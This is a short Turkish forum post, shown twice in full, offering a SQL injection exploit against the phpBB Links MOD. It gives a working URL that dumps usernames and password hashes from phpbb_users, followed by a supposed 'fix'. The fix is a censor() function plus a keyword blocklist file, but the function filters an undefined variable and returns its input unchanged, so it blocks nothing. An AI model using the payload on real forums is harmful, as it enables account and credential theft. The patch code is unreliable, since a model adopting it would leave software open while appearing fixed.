- 26 Ara 2011
- 11,500
- 12,869
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug :
victim.com/links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
Fix :
links.php dosyasını açın ve
<?
function censor($id){
$fh = fopen("sqlinj.txt","r");
while($word = fgets($fh,4096)) {
$message = ereg_replace(trim($word)," #*@!-",$message);
}
return $id;
}
?>
dosyanın bulundugu klasöre sqlinj.txt adında bir dosya açın ve ekleyin
+,-1,union,select,from,delete,where
Bug :
victim.com/links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
Fix :
links.php dosyasını açın ve
<?
function censor($id){
$fh = fopen("sqlinj.txt","r");
while($word = fgets($fh,4096)) {
$message = ereg_replace(trim($word)," #*@!-",$message);
}
return $id;
}
?>
dosyanın bulundugu klasöre sqlinj.txt adında bir dosya açın ve ekleyin
+,-1,union,select,from,delete,where